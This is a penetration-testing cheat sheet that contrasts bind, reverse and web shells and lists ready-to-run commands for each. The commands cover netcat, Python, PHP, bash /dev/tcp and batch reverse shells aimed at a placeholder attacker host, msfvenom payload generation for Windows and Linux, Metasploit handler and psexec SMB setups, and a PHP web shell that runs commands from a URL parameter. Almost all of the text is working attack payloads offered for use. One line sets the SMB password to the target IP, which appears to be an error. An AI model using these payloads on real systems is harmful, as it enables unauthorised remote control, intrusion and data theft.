Reverse vs Bind vs Web Shell

Bind Shell

The code is used to start a listener attached to a shell on the target. Then we can connect to the port to obtain remote code execution. This has the advantage of not requiring any configuration on our network, but may be prevented by firewalls protecting the target.

Reverse Shell

The code makes the target to connects back to the attacker computer.  Reverse shells are a good way to bypass firewalls. The drawback is that we need to configure our network to accept the shell: we need to set up an handler.

Web Shell

The code allows the attacker to send shell commands to the target server via a web page hosted on this server.

Reverse Shell Handlers

NETCAT

nc -lvnp [ATTACKER_PORT]
Open a listener on delected port.

METASPLOIT

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp
exploit
Handler for linux (efl) reverse shell.

Reverse Shell Multi

Resources

PayloadsAllTheThings Reverse Shell Cheat Sheet

Pentestmonkey Reverse Shell Cheat Sheet

NETCAT

nc -e /bin/bash [ATTACKER_IP] [ATTACKER_PORT]
Reverse shell.

PYTHON

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ATTACKER_IP]",[ATTACKER_PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Reverse Shell.

PHP

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1'");
?>
Very simple reverse shell.

Fancy reverse shell: Pentestmonkey PHP Reverse Shell Location on Kali: /usr/share/webshells/php/php-reverse-shell.php

Reverse Shell Windows

BAT

@echo off nc.exe [ATTACKER_IP] [ATTACKER_PORT] -e cmd.exe
Reverse Shell.

HOAXSHELL

sudo python3 hoaxshell.py -s [ATTACKER_IP]
Create a reverse shell payload (that utilizes Invoke-Expression) and start a handler.

MSFVENOM

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a reverse shell exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a meterpreter reverse shell exe.

METASPLOIT (SMB)

use exploit/windows/smb/psexec

set lhost [ATTACKER_IP]
set rhosts [TARGET_IP]
set smbdomain [TARGET_DOMAIN]
set smbuser [TARGET_USER]
set smbpass [TARGET_IP]
set payload windows/x64/meterpreter/reverse_tcp
exploit
Create a reverse shell from a SMB share.

Reverse Shell Linux

BASH

bash -i >& /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1
Reverse Shell.

MSFVENOM

msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT]
Generate a Linux reverse shell.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f elf > reverse.elf
Generate a Meterpreter Reverse Shell for Linux x86.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f elf > reverse.elf
Generate a Meterpreter Reverse Shell for Linux x64.

Web Shell

PHP

<?php
system($_GET["cmd"]);
?>
Web shell. After upload, go to http://[TARGET_IP]/myWebShell.php?cmd=whoami